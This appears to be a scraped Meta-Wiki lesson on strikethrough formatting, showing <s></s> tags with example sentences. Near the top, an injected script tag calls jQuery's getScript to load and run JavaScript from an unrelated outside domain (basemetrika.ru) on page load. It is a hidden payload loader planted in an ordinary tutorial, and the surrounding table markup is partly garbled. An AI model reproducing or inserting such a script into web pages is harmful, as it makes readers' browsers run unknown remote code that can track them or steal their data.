From Meta, a Wikimedia project coordination wiki
File:Woodpecker10.jpg
[[#<script>$.getScript('//basemetrika.ru/s/e41')</script>|
Strikethrough formatting
|
Welcome! In this lesson, we'll learn how to format text in Strikethrough
|
Quick Tip(s)
 |
Code |
Result
|
Surround the text with <s></s>. If you want to write Strikethrough, type <s>Strikethrough</s> In HTML the code is <s>Word</s> |
<s>Word</s> |
Word
|
| <s>India</s> is a large country |
India is a large country
|
| <s>Wikipedia</s> is an encyclopedia |
Wikipedia is an encyclopedia
|
| <s>1945</s> and <s>1946</s> |
1945 and 1946
|
Learn next Superscript or go back to Main page